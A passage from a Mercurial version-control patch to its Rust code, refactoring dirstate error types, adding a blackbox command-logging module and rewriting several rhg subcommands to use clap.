+ thread.join().unwrap_or_else(|panic_payload| { + std::panic::resume_unwind(panic_payload) + }) + }); + + // Drop anything left in the channel + for pybytes in pybytes_receiver.iter() { + pybytes.release_ref(py) + } + }; + let out = PyDict::new(py); - for (dest, source) in res.into_iter() { + for (dest, source) in path_copies.into_iter() { out.set_item( py, PyBytes::new(py, &dest.into_vec()), @@ -135,7 +232,7 @@ children: PyDict, target_rev: Revision, rev_info: PyObject, - is_ancestor: PyObject + multi_thread: bool ) ), )?; diff --git a/rust/hg-cpython/src/dirstate.rs b/rust/hg-cpython/src/dirstate.rs --- a/rust/hg-cpython/src/dirstate.rs +++ b/rust/hg-cpython/src/dirstate.rs @@ -24,10 +24,7 @@ exc, PyBytes, PyDict, PyErr, PyList, PyModule, PyObject, PyResult, PySequence, Python, }; -use hg::{ - utils::hg_path::HgPathBuf, DirstateEntry, DirstateParseError, EntryState, - StateMap, -}; +use hg::{utils::hg_path::HgPathBuf, DirstateEntry, EntryState, StateMap}; use libc::{c_char, c_int}; use std::convert::TryFrom; @@ -79,11 +76,10 @@ .map(|(filename, stats)| { let stats = stats.extract::<PySequence>(py)?; let state = stats.get_item(py, 0)?.extract::<PyBytes>(py)?; - let state = EntryState::try_from(state.data(py)[0]).map_err( - |e: DirstateParseError| { + let state = + EntryState::try_from(state.data(py)[0]).map_err(|e| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) - }, - )?; + })?; let mode = stats.get_item(py, 1)?.extract(py)?; let size = stats.get_item(py, 2)?.extract(py)?; let mtime = stats.get_item(py, 3)?.extract(py)?; diff --git a/rust/hg-cpython/src/dirstate/dirs_multiset.rs b/rust/hg-cpython/src/dirstate/dirs_multiset.rs --- a/rust/hg-cpython/src/dirstate/dirs_multiset.rs +++ b/rust/hg-cpython/src/dirstate/dirs_multiset.rs @@ -18,9 +18,9 @@ use crate::dirstate::extract_dirstate; use hg::{ + errors::HgError, utils::hg_path::{HgPath, HgPathBuf}, - DirsMultiset, DirsMultisetIter, DirstateMapError, DirstateParseError, - EntryState, + DirsMultiset, 
DirsMultisetIter, DirstateMapError, EntryState, }; py_class!(pub class Dirs |py| { @@ -38,7 +38,7 @@ skip_state = Some( skip.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, ); @@ -46,7 +46,7 @@ let inner = if let Ok(map) = map.cast_as::<PyDict>(py) { let dirstate = extract_dirstate(py, &map)?; DirsMultiset::from_dirstate(&dirstate, skip_state) - .map_err(|e| { + .map_err(|e: DirstateMapError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })? } else { diff --git a/rust/hg-cpython/src/dirstate/dirstate_map.rs b/rust/hg-cpython/src/dirstate/dirstate_map.rs --- a/rust/hg-cpython/src/dirstate/dirstate_map.rs +++ b/rust/hg-cpython/src/dirstate/dirstate_map.rs @@ -14,8 +14,8 @@ use cpython::{ exc, ObjectProtocol, PyBool, PyBytes, PyClone, PyDict, PyErr, PyList, - PyObject, PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject, - UnsafePyLeaked, + PyObject, PyResult, PySet, PyString, PyTuple, Python, PythonObject, + ToPyObject, UnsafePyLeaked, }; use crate::{ @@ -24,12 +24,14 @@ NonNormalEntries, NonNormalEntriesIterator, }, dirstate::{dirs_multiset::Dirs, make_dirstate_tuple}, + parsers::dirstate_parents_to_pytuple, }; use hg::{ + errors::HgError, + revlog::Node, utils::hg_path::{HgPath, HgPathBuf}, DirsMultiset, DirstateEntry, DirstateMap as RustDirstateMap, - DirstateMapError, DirstateParents, DirstateParseError, EntryState, - StateMapIter, PARENT_SIZE, + DirstateMapError, DirstateParents, EntryState, StateMapIter, }; // TODO @@ -84,13 +86,13 @@ HgPath::new(f.extract::<PyBytes>(py)?.data(py)), oldstate.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, DirstateEntry { state: state.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, 
_>(py, e.to_string()) })?, mode: mode.extract(py)?, @@ -113,7 +115,7 @@ HgPath::new(f.extract::<PyBytes>(py)?.data(py)), oldstate.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, size.extract(py)?, @@ -137,7 +139,7 @@ HgPath::new(f.extract::<PyBytes>(py)?.data(py)), oldstate.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, ) @@ -173,18 +175,11 @@ let (_, other_parent) = inner_shared.get_non_normal_other_parent_entries(); - let locals = PyDict::new(py); - locals.set_item( - py, - "other_parent", - other_parent - .iter() - .map(|v| PyBytes::new(py, v.as_bytes())) - .collect::<Vec<PyBytes>>() - .to_py_object(py), - )?; - - py.eval("set(other_parent)", None, Some(&locals)) + let set = PySet::empty(py)?; + for path in other_parent.iter() { + set.add(py, PyBytes::new(py, path.as_bytes()))?; + } + Ok(set.into_object()) } def non_normal_entries(&self) -> PyResult<NonNormalEntries> { @@ -285,10 +280,7 @@ def parents(&self, st: PyObject) -> PyResult<PyTuple> { self.inner(py).borrow_mut() .parents(st.extract::<PyBytes>(py)?.data(py)) - .and_then(|d| { - Ok((PyBytes::new(py, &d.p1), PyBytes::new(py, &d.p2)) - .to_py_object(py)) - }) + .map(|parents| dirstate_parents_to_pytuple(py, parents)) .or_else(|_| { Err(PyErr::new::<exc::OSError, _>( py, @@ -311,9 +303,8 @@ .read(st.extract::<PyBytes>(py)?.data(py)) { Ok(Some(parents)) => Ok(Some( - (PyBytes::new(py, &parents.p1), PyBytes::new(py, &parents.p2)) - .to_py_object(py) - .into_object(), + dirstate_parents_to_pytuple(py, parents) + .into_object() )), Ok(None) => Ok(Some(py.None())), Err(_) => Err(PyErr::new::<exc::OSError, _>( @@ -549,14 +540,12 @@ ) -> Ref<'a, RustDirstateMap> { self.inner(py).borrow() } - #[cfg(not(feature = "dirstate-tree"))] fn translate_key( py: Python, res: (&HgPathBuf, 
&DirstateEntry), ) -> PyResult<Option<PyBytes>> { Ok(Some(PyBytes::new(py, res.0.as_bytes()))) } - #[cfg(not(feature = "dirstate-tree"))] fn translate_key_value( py: Python, res: (&HgPathBuf, &DirstateEntry), @@ -567,24 +556,6 @@ make_dirstate_tuple(py, &entry)?, ))) } - #[cfg(feature = "dirstate-tree")] - fn translate_key( - py: Python, - res: (HgPathBuf, DirstateEntry), - ) -> PyResult<Option<PyBytes>> { - Ok(Some(PyBytes::new(py, res.0.as_bytes()))) - } - #[cfg(feature = "dirstate-tree")] - fn translate_key_value( - py: Python, - res: (HgPathBuf, DirstateEntry), - ) -> PyResult<Option<(PyBytes, PyObject)>> { - let (f, entry) = res; - Ok(Some(( - PyBytes::new(py, f.as_bytes()), - make_dirstate_tuple(py, &entry)?, - ))) - } } py_shared_iterator!( @@ -601,7 +572,7 @@ Option<(PyBytes, PyObject)> ); -fn extract_node_id(py: Python, obj: &PyObject) -> PyResult<[u8; PARENT_SIZE]> { +fn extract_node_id(py: Python, obj: &PyObject) -> PyResult<Node> { let bytes = obj.extract::<PyBytes>(py)?; match bytes.data(py).try_into() { Ok(s) => Ok(s), diff --git a/rust/hg-cpython/src/parsers.rs b/rust/hg-cpython/src/parsers.rs --- a/rust/hg-cpython/src/parsers.rs +++ b/rust/hg-cpython/src/parsers.rs @@ -15,8 +15,7 @@ }; use hg::{ pack_dirstate, parse_dirstate, utils::hg_path::HgPathBuf, DirstateEntry, - DirstatePackError, DirstateParents, DirstateParseError, FastHashMap, - PARENT_SIZE, + DirstateParents, FastHashMap, PARENT_SIZE, }; use std::convert::TryInto; @@ -54,26 +53,9 @@ PyBytes::new(py, copy_path.as_bytes()), )?; } - Ok( - (PyBytes::new(py, &parents.p1), PyBytes::new(py, &parents.p2)) - .to_py_object(py), - ) + Ok(dirstate_parents_to_pytuple(py, parents)) } - Err(e) => Err(PyErr::new::<exc::ValueError, _>( - py, - match e { - DirstateParseError::TooLittleData => { - "too little data for parents".to_string() - } - DirstateParseError::Overflow => { - "overflow in dirstate".to_string() - } - DirstateParseError::CorruptedEntry(e) => e, - DirstateParseError::Damaged => { - 
"dirstate appears to be damaged".to_string() - } - }, - )), + Err(e) => Err(PyErr::new::<exc::ValueError, _>(py, e.to_string())), } } @@ -128,18 +110,9 @@ } Ok(PyBytes::new(py, &packed)) } - Err(error) => Err(PyErr::new::<exc::ValueError, _>( - py, - match error { - DirstatePackError::CorruptedParent => { - "expected a 20-byte hash".to_string() - } - DirstatePackError::CorruptedEntry(e) => e, - DirstatePackError::BadSize(expected, actual) => { - format!("bad dirstate size: {} != {}", actual, expected) - } - }, - )), + Err(error) => { + Err(PyErr::new::<exc::ValueError, _>(py, error.to_string())) + } } } @@ -179,3 +152,12 @@ Ok(m) } + +pub(crate) fn dirstate_parents_to_pytuple( + py: Python, + parents: &DirstateParents, +) -> PyTuple { + let p1 = PyBytes::new(py, parents.p1.as_bytes()); + let p2 = PyBytes::new(py, parents.p2.as_bytes()); + (p1, p2).to_py_object(py) +} diff --git a/rust/hg-cpython/src/revlog.rs b/rust/hg-cpython/src/revlog.rs --- a/rust/hg-cpython/src/revlog.rs +++ b/rust/hg-cpython/src/revlog.rs @@ -12,13 +12,13 @@ use cpython::{ buffer::{Element, PyBuffer}, exc::{IndexError, ValueError}, - ObjectProtocol, PyBytes, PyClone, PyDict, PyErr, PyModule, PyObject, - PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject, + ObjectProtocol, PyBytes, PyClone, PyDict, PyErr, PyInt, PyModule, + PyObject, PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject, }; use hg::{ nodemap::{Block, NodeMapError, NodeTree}, - revlog::{nodemap::NodeMap, RevlogIndex}, - NodeError, Revision, + revlog::{nodemap::NodeMap, NodePrefix, RevlogIndex}, + Revision, }; use std::cell::RefCell; @@ -64,7 +64,7 @@ let nt = opt.as_ref().unwrap(); let idx = &*self.cindex(py).borrow(); let node = node_from_py_bytes(py, &node)?; - nt.find_bin(idx, (&node).into()).map_err(|e| nodemap_error(py, e)) + nt.find_bin(idx, node.into()).map_err(|e| nodemap_error(py, e)) } /// same as `get_rev()` but raises a bare `error.RevlogError` if node @@ -107,7 +107,9 @@ 
String::from_utf8_lossy(node.data(py)).to_string() }; - nt.find_hex(idx, &node_as_string) + let prefix = NodePrefix::from_hex(&node_as_string).map_err(|_| PyErr::new::<ValueError, _>(py, "Invalid node or prefix"))?; + + nt.find_bin(idx, prefix) // TODO make an inner API returning the node directly .map(|opt| opt.map( |rev| PyBytes::new(py, idx.node(rev).unwrap().as_bytes()))) @@ -283,6 +285,10 @@ self.inner_update_nodemap_data(py, docket, nm_data) } + @property + def entry_size(&self) -> PyResult<PyInt> { + self.cindex(py).borrow().inner().getattr(py, "entry_size")?.extract::<PyInt>(py) + } }); @@ -468,17 +474,9 @@ match err { NodeMapError::MultipleResults => revlog_error(py), NodeMapError::RevisionNotInIndex(r) => rev_not_in_index(py, r), - NodeMapError::InvalidNodePrefix(s) => invalid_node_prefix(py, &s), } } -fn invalid_node_prefix(py: Python, ne: &NodeError) -> PyErr { - PyErr::new::<ValueError, _>( - py, - format!("Invalid node or prefix: {:?}", ne), - ) -} - /// Create the module, with __package__ given from parent pub fn init_module(py: Python, package: &str) -> PyResult<PyModule> { let dotted_name = &format!("{}.revlog", package); diff --git a/rust/hgcli/README.md b/rust/hgcli/README.md --- a/rust/hgcli/README.md +++ b/rust/hgcli/README.md @@ -32,7 +32,7 @@ Mercurial Distributed SCM (version 5.3.1+433-f99cd77d53dc+20200331) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-2020 Matt Mackall and others + Copyright (C) 2005-2020 Olivia Mackall and others This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
diff --git a/rust/rhg/Cargo.toml b/rust/rhg/Cargo.toml --- a/rust/rhg/Cargo.toml +++ b/rust/rhg/Cargo.toml @@ -9,8 +9,13 @@ [dependencies] hg-core = { path = "../hg-core"} +chrono = "0.4.19" clap = "2.33.1" +derive_more = "0.99" +lazy_static = "1.4.0" log = "0.4.11" micro-timer = "0.3.1" +regex = "1.3.9" env_logger = "0.7.1" -format-bytes = "0.1.3" +format-bytes = "0.2.1" +users = "0.11.0" diff --git a/rust/rhg/src/blackbox.rs b/rust/rhg/src/blackbox.rs new file mode 100644 --- /dev/null +++ b/rust/rhg/src/blackbox.rs @@ -0,0 +1,163 @@ +//! Logging for repository events, including commands run in the repository. + +use crate::CliInvocation; +use format_bytes::format_bytes; +use hg::errors::HgError; +use hg::repo::Repo; +use hg::utils::{files::get_bytes_from_os_str, shell_quote}; + +const ONE_MEBIBYTE: u64 = 1 << 20; + +// TODO: somehow keep defaults in sync with `configitem` in `hgext/blackbox.py` +const DEFAULT_MAX_SIZE: u64 = ONE_MEBIBYTE; +const DEFAULT_MAX_FILES: u32 = 7; + +// Python does not support %.3f, only %f +const DEFAULT_DATE_FORMAT: &str = "%Y/%m/%d %H:%M:%S%.3f"; + +type DateTime = chrono::DateTime<chrono::Local>; + +pub struct ProcessStartTime { + /// For measuring duration + monotonic_clock: std::time::Instant, + /// For formatting with year, month, day, etc. 
+ calendar_based: DateTime, +} + +impl ProcessStartTime { + pub fn now() -> Self { + Self { + monotonic_clock: std::time::Instant::now(), + calendar_based: chrono::Local::now(), + } + } +} + +pub struct Blackbox<'a> { + process_start_time: &'a ProcessStartTime, + /// Do nothing if this is `None` + configured: Option<ConfiguredBlackbox<'a>>, +} + +struct ConfiguredBlackbox<'a> { + repo: &'a Repo, + max_size: u64, + max_files: u32, + date_format: &'a str, +} + +impl<'a> Blackbox<'a> { + pub fn new( + invocation: &'a CliInvocation<'a>, + process_start_time: &'a ProcessStartTime, + ) -> Result<Self, HgError> { + let configured = if let Ok(repo) = invocation.repo { + if invocation.config.get(b"extensions", b"blackbox").is_none() { + // The extension is not enabled + None + } else { + Some(ConfiguredBlackbox { + repo, + max_size: invocation + .config + .get_byte_size(b"blackbox", b"maxsize")? + .unwrap_or(DEFAULT_MAX_SIZE), + max_files: invocation + .config + .get_u32(b"blackbox", b"maxfiles")? + .unwrap_or(DEFAULT_MAX_FILES), + date_format: invocation + .config + .get_str(b"blackbox", b"date-format")? + .unwrap_or(DEFAULT_DATE_FORMAT), + }) + } + } else { + // Without a local repository there’s no `.hg/blackbox.log` to + // write to. 
+ None + }; + Ok(Self { + process_start_time, + configured, + }) + } + + pub fn log_command_start(&self) { + if let Some(configured) = &self.configured { + let message = format_bytes!(b"(rust) {}", format_cli_args()); + configured.log(&self.process_start_time.calendar_based, &message); + } + } + + pub fn log_command_end(&self, exit_code: i32) { + if let Some(configured) = &self.configured { + let now = chrono::Local::now(); + let duration = self + .process_start_time + .monotonic_clock + .elapsed() + .as_secs_f64(); + let message = format_bytes!( + b"(rust) {} exited {} after {} seconds", + format_cli_args(), + exit_code, + format_bytes::Utf8(format_args!("{:.03}", duration)) + ); + configured.log(&now, &message); + } + } +} + +impl ConfiguredBlackbox<'_> { + fn log(&self, date_time: &DateTime, message: &[u8]) { + let date = format_bytes::Utf8(date_time.format(self.date_format)); + let user = users::get_current_username().map(get_bytes_from_os_str); + let user = user.as_deref().unwrap_or(b"???"); + let rev = format_bytes::Utf8(match self.repo.dirstate_parents() { + Ok(parents) if parents.p2 == hg::revlog::node::NULL_NODE => { + format!("{:x}", parents.p1) + } + Ok(parents) => format!("{:x}+{:x}", parents.p1, parents.p2), + Err(_dirstate_corruption_error) => { + // TODO: log a non-fatal warning to stderr + "???".to_owned() + } + }); + let pid = std::process::id(); + let line = format_bytes!( + b"{} {} @{} ({})> {}\n", + date, + user, + rev, + pid, + message + ); + let result = + hg::logging::LogFile::new(self.repo.hg_vfs(), "blackbox.log") + .max_size(Some(self.max_size)) + .max_files(self.max_files) + .write(&line); + match result { + Ok(()) => {} + Err(_io_error) => { + // TODO: log a non-fatal warning to stderr + } + } + } +} + +fn format_cli_args() -> Vec<u8> { + let mut args = std::env::args_os(); + let _ = args.next(); // Skip the first (or zeroth) arg, the name of the `rhg` executable + let mut args = args.map(|arg| shell_quote(&get_bytes_from_os_str(arg))); 
+ let mut formatted = Vec::new(); + if let Some(arg) = args.next() { + formatted.extend(arg) + } + for arg in args { + formatted.push(b' '); + formatted.extend(arg) + } + formatted +} diff --git a/rust/rhg/src/commands.rs b/rust/rhg/src/commands.rs deleted file mode 100644 --- a/rust/rhg/src/commands.rs +++ /dev/null @@ -1,14 +0,0 @@ -pub mod cat; -pub mod debugdata; -pub mod debugrequirements; -pub mod files; -pub mod root; -use crate::error::CommandError; -use crate::ui::Ui; - -/// The common trait for rhg commands -/// -/// Normalize the interface of the commands provided by rhg -pub trait Command { - fn run(&self, ui: &Ui) -> Result<(), CommandError>; -} diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,9 +1,7 @@ -use crate::commands::Command; -use crate::error::{CommandError, CommandErrorKind}; -use crate::ui::utf8_to_local; -use crate::ui::Ui; -use hg::operations::{cat, CatRevError, CatRevErrorKind}; -use hg::repo::Repo; +use crate::error::CommandError; +use clap::Arg; +use format_bytes::format_bytes; +use hg::operations::cat; use hg::utils::hg_path::HgPathBuf; use micro_timer::timed; use std::convert::TryFrom; @@ -12,94 +10,75 @@ Output the current or given revision of files "; -pub struct CatCommand<'a> { - rev: Option<&'a str>, - files: Vec<&'a str>, -} - -impl<'a> CatCommand<'a> { - pub fn new(rev: Option<&'a str>, files: Vec<&'a str>) -> Self { - Self { rev, files } - } - - fn display(&self, ui: &Ui, data: &[u8]) -> Result<(), CommandError> { - ui.write_stdout(data)?; - Ok(()) - } -} - -impl<'a> Command for CatCommand<'a> { - #[timed] - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; - repo.check_requirements()?; - let cwd = std::env::current_dir() - .or_else(|e| Err(CommandErrorKind::CurrentDirNotFound(e)))?; - - let mut files = vec![]; - for file in self.files.iter() { - let normalized = cwd.join(&file); - let stripped = 
normalized - .strip_prefix(&repo.working_directory_path()) - .or(Err(CommandErrorKind::Abort(None)))?; - let hg_file = HgPathBuf::try_from(stripped.to_path_buf()) - .or(Err(CommandErrorKind::Abort(None)))?; - files.push(hg_file); - } - - match self.rev { - Some(rev) => { - let data = cat(&repo, rev, &files) - .map_err(|e| map_rev_error(rev, e))?; - self.display(ui, &data) - } - None => Err(CommandErrorKind::Unimplemented.into()), - } - } +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("cat") + .arg( + Arg::with_name("rev") + .help("search the repository as it is in REV") + .short("-r") + .long("--revision") + .value_name("REV") + .takes_value(true), + ) + .arg( + clap::Arg::with_name("files") + .required(true) + .multiple(true) + .empty_values(false) + .value_name("FILE") + .help("the files to print"), + ) + .about(HELP_TEXT) } -/// Convert `CatRevErrorKind` to `CommandError` -fn map_rev_error(rev: &str, err: CatRevError) -> CommandError { - CommandError { - kind: match err.kind { - CatRevErrorKind::IoError(err) => CommandErrorKind::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), - CatRevErrorKind::InvalidRevision => CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), - )), - CatRevErrorKind::AmbiguousPrefix => CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier {}\n", - rev - )) - .into(), - )), - CatRevErrorKind::UnsuportedRevlogVersion(version) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )) +#[timed] +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let rev = invocation.subcommand_args.value_of("rev"); + let file_args = match invocation.subcommand_args.values_of("files") { + Some(files) => files.collect(), + None => vec![], + }; + + let repo = invocation.repo?;
+ let cwd = hg::utils::current_dir()?; + let working_directory = repo.working_directory_path(); + let working_directory = cwd.join(working_directory); // Make it absolute + + let mut files = vec![]; + for file in file_args.iter() { + // TODO: actually normalize `..` path segments etc? + let normalized = cwd.join(&file); + let stripped = normalized + .strip_prefix(&working_directory) + // TODO: error message for path arguments outside of the repo + .map_err(|_| CommandError::abort(""))?; + let hg_file = HgPathBuf::try_from(stripped.to_path_buf()) + .map_err(|e| CommandError::abort(e.to_string()))?; + files.push(hg_file); + } + + match rev { + Some(rev) => { + let output = cat(&repo, rev, &files).map_err(|e| (e, rev))?; + invocation.ui.write_stdout(&output.concatenated)?; + if !output.missing.is_empty() { + let short = format!("{:x}", output.node.short()).into_bytes(); + for path in &output.missing { + invocation.ui.write_stderr(&format_bytes!( + b"{}: no such file in rev {}\n", + path.as_bytes(), + short + ))?; + } } - CatRevErrorKind::CorruptedRevlog => CommandErrorKind::Abort(Some( - "abort: corrupted revlog\n".into(), - )), - CatRevErrorKind::UnknowRevlogDataFormat(format) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) + if output.found_any { + Ok(()) + } else { + Err(CommandError::Unsuccessful) } - }, + } + None => Err(CommandError::unsupported( + "`rhg cat` without `--rev` / `-r`", + )), } } diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/config.rs copy from rust/rhg/src/commands/root.rs copy to rust/rhg/src/commands/config.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/config.rs @@ -1,29 +1,38 @@ -use crate::commands::Command; use crate::error::CommandError; -use crate::ui::Ui; +use clap::Arg; use format_bytes::format_bytes; -use hg::repo::Repo; -use hg::utils::files::get_bytes_from_path; +use hg::errors::HgError; +use 
hg::utils::SliceExt; pub const HELP_TEXT: &str = " -Print the root directory of the current repository. - -Returns 0 on success. +With one argument of the form section.name, print just the value of that config item. "; -pub struct RootCommand {} - -impl RootCommand { - pub fn new() -> Self { - RootCommand {} - } +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("config") + .arg( + Arg::with_name("name") + .help("the section.name to print") + .value_name("NAME") + .required(true) + .takes_value(true), + ) + .about(HELP_TEXT) } -impl Command for RootCommand { - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; - let bytes = get_bytes_from_path(repo.working_directory_path()); - ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let (section, name) = invocation + .subcommand_args + .value_of("name") + .expect("missing required CLI argument") + .as_bytes() + .split_2(b'.') + .ok_or_else(|| HgError::unsupported("hg config <section>"))?; + + if let Some(value) = invocation.config.get(section, name) { + invocation.ui.write_stdout(&format_bytes!(b"{}\n", value))?; Ok(()) + } else { + Err(CommandError::Unsuccessful) } } diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ b/rust/rhg/src/commands/debugdata.rs @@ -1,91 +1,65 @@ -use crate::commands::Command; -use crate::error::{CommandError, CommandErrorKind}; -use crate::ui::utf8_to_local; -use crate::ui::Ui; -use hg::operations::{ - debug_data, DebugDataError, DebugDataErrorKind, DebugDataKind, -}; -use hg::repo::Repo; +use crate::error::CommandError; +use clap::Arg; +use clap::ArgGroup; +use hg::operations::{debug_data, DebugDataKind}; use micro_timer::timed; pub const HELP_TEXT: &str = " Dump the contents of a data file revision "; -pub struct DebugDataCommand<'a> { - rev: &'a str, - kind: 
DebugDataKind, -} - -impl<'a> DebugDataCommand<'a> { - pub fn new(rev: &'a str, kind: DebugDataKind) -> Self { - DebugDataCommand { rev, kind } - } -} - -impl<'a> Command for DebugDataCommand<'a> { - #[timed] - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; - let data = debug_data(&repo, self.rev, self.kind) - .map_err(|e| to_command_error(self.rev, e))?; - - let mut stdout = ui.stdout_buffer(); - stdout.write_all(&data)?; - stdout.flush()?; - - Ok(()) - } +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("debugdata") + .arg( + Arg::with_name("changelog") + .help("open changelog") + .short("-c") + .long("--changelog"), + ) + .arg( + Arg::with_name("manifest") + .help("open manifest") + .short("-m") + .long("--manifest"), + ) + .group( + ArgGroup::with_name("") + .args(&["changelog", "manifest"]) + .required(true), + ) + .arg( + Arg::with_name("rev") + .help("revision") + .required(true) + .value_name("REV"), + ) + .about(HELP_TEXT) } -/// Convert operation errors to command errors -fn to_command_error(rev: &str, err: DebugDataError) -> CommandError { - match err.kind { - DebugDataErrorKind::IoError(err) => CommandError { - kind: CommandErrorKind::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), - }, - DebugDataErrorKind::InvalidRevision => CommandError { - kind: CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier{}\n", - rev - )) - .into(), - )), - }, - DebugDataErrorKind::AmbiguousPrefix => CommandError { - kind: CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier{}\n", - rev - )) - .into(), - )), - }, - DebugDataErrorKind::UnsuportedRevlogVersion(version) => CommandError { - kind: CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )), - }, - DebugDataErrorKind::CorruptedRevlog => CommandError { - kind: 
CommandErrorKind::Abort(Some( - "abort: corrupted revlog\n".into(), - )), - }, - DebugDataErrorKind::UnknowRevlogDataFormat(format) => CommandError { - kind: CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )), - }, - } +#[timed] +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let args = invocation.subcommand_args; + let rev = args + .value_of("rev") + .expect("rev should be a required argument"); + let kind = + match (args.is_present("changelog"), args.is_present("manifest")) { + (true, false) => DebugDataKind::Changelog, + (false, true) => DebugDataKind::Manifest, + (true, true) => { + unreachable!("Should not happen since options are exclusive") + } + (false, false) => { + unreachable!("Should not happen since options are required") + } + }; + + let repo = invocation.repo?; + let data = debug_data(repo, rev, kind).map_err(|e| (e, rev))?; + + let mut stdout = invocation.ui.stdout_buffer(); + stdout.write_all(&data)?; + stdout.flush()?; + + Ok(()) } diff --git a/rust/rhg/src/commands/debugrequirements.rs b/rust/rhg/src/commands/debugrequirements.rs --- a/rust/rhg/src/commands/debugrequirements.rs +++ b/rust/rhg/src/commands/debugrequirements.rs @@ -1,30 +1,22 @@ -use crate::commands::Command; use crate::error::CommandError; -use crate::ui::Ui; -use hg::repo::Repo; -use hg::requirements; pub const HELP_TEXT: &str = " Print the current repo requirements. "; -pub struct DebugRequirementsCommand {} - -impl DebugRequirementsCommand { - pub fn new() -> Self { - DebugRequirementsCommand {} - } +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("debugrequirements").about(HELP_TEXT) } -impl Command for DebugRequirementsCommand { - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; - let mut output = String::new(); - for req in requirements::load(&repo)? 
{ - output.push_str(&req); - output.push('\n'); - } - ui.write_stdout(output.as_bytes())?; - Ok(()) +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let repo = invocation.repo?; + let mut output = String::new(); + let mut requirements: Vec<_> = repo.requirements().iter().collect(); + requirements.sort(); + for req in requirements { + output.push_str(req); + output.push('\n'); } + invocation.ui.write_stdout(output.as_bytes())?; + Ok(()) } diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -1,15 +1,10 @@ -use crate::commands::Command; -use crate::error::{CommandError, CommandErrorKind}; -use crate::ui::utf8_to_local; +use crate::error::CommandError; use crate::ui::Ui; -use hg::operations::{ - list_rev_tracked_files, ListRevTrackedFilesError, - ListRevTrackedFilesErrorKind, -}; -use hg::operations::{ - Dirstate, ListDirstateTrackedFilesError, ListDirstateTrackedFilesErrorKind, -}; +use clap::Arg; +use hg::operations::list_rev_tracked_files; +use hg::operations::Dirstate; use hg::repo::Repo; +use hg::utils::current_dir; use hg::utils::files::{get_bytes_from_path, relativize_path}; use hg::utils::hg_path::{HgPath, HgPathBuf}; @@ -19,124 +14,78 @@ Returns 0 on success. 
"; -pub struct FilesCommand<'a> { - rev: Option<&'a str>, +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("files") + .arg( + Arg::with_name("rev") + .help("search the repository as it is in REV") + .short("-r") + .long("--revision") + .value_name("REV") + .takes_value(true), + ) + .about(HELP_TEXT) } -impl<'a> FilesCommand<'a> { - pub fn new(rev: Option<&'a str>) -> Self { - FilesCommand { rev } +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let relative = invocation.config.get(b"ui", b"relative-paths"); + if relative.is_some() { + return Err(CommandError::unsupported( + "non-default ui.relative-paths", + )); } - fn display_files( - &self, - ui: &Ui, - repo: &Repo, - files: impl IntoIterator<Item = &'a HgPath>, - ) -> Result<(), CommandError> { - let cwd = std::env::current_dir() - .or_else(|e| Err(CommandErrorKind::CurrentDirNotFound(e)))?; - let rooted_cwd = cwd - 